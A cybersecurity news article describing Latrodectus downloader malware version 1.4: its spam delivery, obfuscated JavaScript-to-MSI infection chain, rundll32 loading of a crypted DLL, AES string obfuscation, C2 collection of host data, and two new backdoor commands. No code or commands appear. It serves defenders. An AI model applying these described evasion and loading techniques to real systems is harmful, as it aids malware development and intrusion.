The Latrodectus malware has been observed to have enhanced capabilities and sophisticated evasion techniques. Initially discovered by Walmart in October 2023, Latrodectus has gained notoriety for its similarities with the infamous IcedID malware.
This article delves into the new features of Latrodectus version 1.4, its delivery mechanisms, and the implications for cybersecurity.
Latrodectus, a downloader malware, was first identified in late 2023. It quickly became a subject of interest due to its code and infrastructure similarities with IcedID, as reported by cybersecurity firms Proofpoint and Team Cymru S2.
The malware is primarily disseminated through email spam campaigns orchestrated by two threat actors, TA577 and TA578. In July 2024, it was also observed being delivered by a BRC4 badger, indicating its evolving distribution strategies.
New Features in Latrodectus Version 1.4
The latest version of Latrodectus, version 1.4, introduces several updates that enhance its malicious capabilities. These include a new string deobfuscation approach, a revised command and control (C2) endpoint, and two additional backdoor commands.
These updates signify a strategic enhancement to improve the malware’s effectiveness and evasion capabilities.
JavaScript File Analysis
The infection chain begins with a heavily obfuscated JavaScript file. The obfuscation technique involves inserting numerous comments to increase file size and complexity, making analysis challenging.
The malware extracts and executes code embedded between these comments, which then downloads and installs an MSI file from a remote server.
MSI File and Crypter Analysis
Upon execution, the MSI file utilizes the Windows tool rundll32.exe to load a DLL named “nvidia.dll” and calls its “AnselEnableCheck” function. This DLL is stored within a CAB file in the MSI.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!
The DLL is obfuscated using a crypto named Dave, a tool previously used by other malware like Emotet and BlackBasta. The crypto decrypts the payload, which is executed to carry out malicious activities.
Enhanced Evasion Techniques
String Obfuscation
A notable change in version 1.4 is adopting AES256 encryption in CTR mode for string obfuscation, replacing the previous XOR operation.
This method uses a hardcoded AES key and varying initialization vectors (IVs) for each string, complicating decryption efforts and analysis.
C2 Communication
Latrodectus collects extensive system information, including username, OS version, and MAC address, which it encrypts using RC4 and sends to the C2 server.
The new version uses a “/test” endpoint for communication, suggesting that its developers are ongoing in testing and refining it.
New Command Capabilities
Version 1.4 introduces two new commands to its arsenal, enhancing its operational flexibility:
- Command 0x16: This command downloads and executes shellcode from a specified server, incorporating a base64 encoding function as a parameter.
- Command 0x19: This command allows the malware to download files to the %AppData% directory, facilitating the deployment of additional payloads.
These additions expand Latrodectus’s capabilities, enabling more complex and targeted attacks.
Detection and Mitigation
Netskope Threat Protection has identified Latrodectus under several threat signatures, including Gen:Variant.Ulise.493872 and Trojan.Generic.36724146.
Their advanced threat protection solutions provide proactive coverage against this evolving threat, helping organizations safeguard their systems.
The rapid evolution of Latrodectus underscores the dynamic nature of cyber threats and the continuous need for vigilance and adaptation in cybersecurity defenses.
The malware’s enhanced capabilities and sophisticated evasion techniques pose significant challenges to security professionals. Understanding these updates is crucial for developing effective detection and mitigation strategies.
Netskope Threat Labs and other cybersecurity entities remain committed to monitoring Latrodectus’s development and providing timely insights to combat its threat.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial